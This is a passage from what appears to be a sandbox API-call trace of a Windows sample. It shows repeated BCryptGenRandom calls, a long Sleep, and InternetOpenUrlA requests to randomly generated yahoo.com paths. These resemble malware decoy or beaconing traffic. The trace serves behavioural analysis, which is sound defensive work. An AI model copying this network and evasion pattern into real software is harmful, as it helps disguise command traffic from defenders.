cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0237.309] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.309] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0237.310] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.310] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0237.310] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.310] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0237.310] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.311] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0237.312] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.312] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0237.313] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.313] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0237.313] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.313] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0237.313] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.313] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0237.313] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.313] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0237.314] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.314] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0237.314] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.314] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0237.314] GetProcessHeap () returned 0x440000 [0237.314] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473560 [0237.314] lstrcpyA (in: lpString1=0x473560, lpString2="\x81…D\x11s://www.yahoo.com" | out: lpString1="\x81…D\x11s://www.yahoo.com") returned="\x81…D\x11s://www.yahoo.com" [0237.314] lstrcatA (in: lpString1="\x81…D\x11s://www.yahoo.com", lpString2="/ho1Qfp1aoc5s6yv0vb4wNop4d3e/" | out: lpString1="\x81…D\x11s://www.yahoo.com/ho1Qfp1aoc5s6yv0vb4wNop4d3e/") returned="\x81…D\x11s://www.yahoo.com/ho1Qfp1aoc5s6yv0vb4wNop4d3e/" [0237.315] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0237.315] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x81…D\x11s://www.yahoo.com/ho1Qfp1aoc5s6yv0vb4wNop4d3e/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0237.315] GetProcessHeap () returned 0x440000 [0237.315] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473560 | out: hHeap=0x440000) returned 1 [0237.315] GetProcessHeap () returned 0x440000 [0237.315] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4f5070 | out: hHeap=0x440000) returned 1 [0237.315] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0237.316] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0237.316] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.316] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0237.316] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0237.316] Sleep (dwMilliseconds=0x14c0a) [0237.585] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.585] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0237.586] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.586] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0237.586] GetProcessHeap () returned 0x440000 [0237.586] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x64) returned 0x3a1b250 [0237.586] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.586] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0237.586] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.586] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b251, cbBuffer=0x2f, dwFlags=0x2 | out: pbBuffer=0x3a1b251) returned 0x0 [0237.587] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.587] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0237.587] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.587] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0237.587] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.587] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0237.587] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.587] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0237.588] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.588] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0237.588] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.588] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0237.588] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.588] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0237.589] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.589] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0237.589] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.589] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0237.589] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.589] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0237.589] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.589] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0237.589] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.590] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0237.590] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.590] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0237.590] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.590] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0237.590] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.590] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0237.591] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.591] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0237.591] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.591] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0237.591] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.591] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0237.591] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.591] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0237.592] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.592] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0237.592] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.592] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0237.592] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.592] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0237.592] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.592] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0237.593] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.593] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0237.593] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.593] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0237.593] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.593] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0237.593] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.593] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0237.594] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.594] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0237.594] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.594] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0237.594] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.594] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0237.594] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.594] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0237.595] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.595] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0237.595] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.595] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0237.595] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.595] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0237.595] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.596] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b280, cbBuffer=0x2d, dwFlags=0x2 | out: pbBuffer=0x3a1b280) returned 0x0 [0237.596] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.596] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0237.596] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.596] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0237.596] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.596] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0237.597] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.597] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0237.597] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.597] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0237.597] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.597] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0237.597] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.597] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0237.598] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.598] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0237.598] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.599] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0237.600] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.600] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0237.600] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.600] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0237.600] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.600] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0237.600] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.600] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0237.601] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.601] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0237.601] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.601] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0237.601] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.601] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0237.601] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.602] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0237.602] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.602] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0237.603] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.603] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0237.603] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.603] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0237.603] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.603] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0237.603] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.603] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0237.603] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.604] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0237.604] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.604] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0237.604] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.604] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0237.604] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.604] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0237.605] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.605] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0237.605] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.605] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0237.605] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.605] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0237.605] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.605] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0237.606] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.606] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0237.606] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.606] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0237.606] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.606] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0237.606] GetProcessHeap () returned 0x440000 [0237.606] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x472f30 [0237.606] lstrcpyA (in: lpString1=0x472f30, lpString2="\x9dò\x18>s://www.yahoo.com" | out: lpString1="\x9dò\x18>s://www.yahoo.com") returned="\x9dò\x18>s://www.yahoo.com" [0237.606] lstrcatA (in: lpString1="\x9dò\x18>s://www.yahoo.com", lpString2="/pt88i0gb9Pzdwlvuc90xfVqjmn2dyekamkD1iptbsp7alt/bWQLbifhaNWu7JtowLotfvux8td76qivoegxXuIn0mbp/" | out: lpString1="\x9dò\x18>s://www.yahoo.com/pt88i0gb9Pzdwlvuc90xfVqjmn2dyekamkD1iptbsp7alt/bWQLbifhaNWu7JtowLotfvux8td76qivoegxXuIn0mbp/") returned="\x9dò\x18>s://www.yahoo.com/pt88i0gb9Pzdwlvuc90xfVqjmn2dyekamkD1iptbsp7alt/bWQLbifhaNWu7JtowLotfvux8td76qivoegxXuIn0mbp/" [0237.606] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0237.606] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x9dò\x18>s://www.yahoo.com/pt88i0gb9Pzdwlvuc90xfVqjmn2dyekamkD1iptbsp7alt/bWQLbifhaNWu7JtowLotfvux8td76qivoegxXuIn0mbp/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, 